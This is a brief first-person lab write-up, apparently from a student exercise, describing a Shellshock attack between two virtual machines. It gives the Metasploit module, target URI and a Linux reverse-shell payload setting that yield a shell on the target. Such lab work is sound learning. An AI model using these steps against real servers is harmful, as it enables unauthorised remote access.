First of all, I changed the network to NatNetwork so that the 2 OS has different IPs.

Then proceed to use ifconfig to find both IPs.

Exploited OS

Kali

After knowing the IP, open Metasploit console to use the CVE exploits and use the CVE code using the ‘use exploit/multi/http/apache_mod_cgi_bash_env_exec’.

After choosing the target, I needed to complete the data to pull off the exploit. So I need to set the RHOSTS to the IP address, set the TARGETURI to cgi-bin/status and set PAYLOAD to linux/x86/shell_reverse_tcp.

Then all we have to do is type ‘exploit’ and I am inside.